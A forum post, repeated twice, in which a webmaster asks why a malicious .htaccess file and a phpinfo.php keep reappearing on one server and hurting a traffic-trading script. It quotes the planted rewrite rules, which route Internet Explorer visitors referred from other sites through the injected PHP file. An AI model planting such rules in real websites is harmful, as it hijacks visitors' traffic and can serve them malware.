Hello.
on one of my servers i been having this wired problem in the last few days.
i keep getting this damn htaccess files on the root of my domain, inside them i see this:
RewriteEngine On
RewriteBase /
RewriteRule ^$ index.shtml
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !phpinfo.php
RewriteCond %{HTTP_USER_AGENT} ^.*MSIE.* [NC]
RewriteCond %{HTTP_REFERER} ^http:// [NC]
RewriteCond %{HTTP_REFERER} !www.whopers .com [NC] (for example)
RewriteRule ^(.*)\.(php|html|htm|shtml)$ phpinfo.php?a=$1&b=$2&c=%{QUERY_STRING} [L]
RewriteRule ^js.js$ phpinfo.php?d=js [L]
also a phpinfo.php is created mostly on the root of the domain. this damn htaccess file is messing with my trading script, i miss alot of hits from my trades and i see in my script HUGE amount of blocked traffic (i use atx).
this happens only on 1 server, and no matter how much i try to delete those files they simply come back, we couldn't track down what makes the files.
on the logs we see the file is created by created by www user which can be anything really. i am using arrow trader extreme and auto gallery sql on my server so i can't figure what causes this .
if any of you ever encountered such a problem or have a clue about the cause please let me know.
thanks ( icq 7247214 )
on one of my servers i been having this wired problem in the last few days.
i keep getting this damn htaccess files on the root of my domain, inside them i see this:
RewriteEngine On
RewriteBase /
RewriteRule ^$ index.shtml
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !phpinfo.php
RewriteCond %{HTTP_USER_AGENT} ^.*MSIE.* [NC]
RewriteCond %{HTTP_REFERER} ^http:// [NC]
RewriteCond %{HTTP_REFERER} !www.whopers .com [NC] (for example)
RewriteRule ^(.*)\.(php|html|htm|shtml)$ phpinfo.php?a=$1&b=$2&c=%{QUERY_STRING} [L]
RewriteRule ^js.js$ phpinfo.php?d=js [L]
also a phpinfo.php is created mostly on the root of the domain. this damn htaccess file is messing with my trading script, i miss alot of hits from my trades and i see in my script HUGE amount of blocked traffic (i use atx).
this happens only on 1 server, and no matter how much i try to delete those files they simply come back, we couldn't track down what makes the files.
on the logs we see the file is created by created by www user which can be anything really. i am using arrow trader extreme and auto gallery sql on my server so i can't figure what causes this .
if any of you ever encountered such a problem or have a clue about the cause please let me know.
thanks ( icq 7247214 )

Comment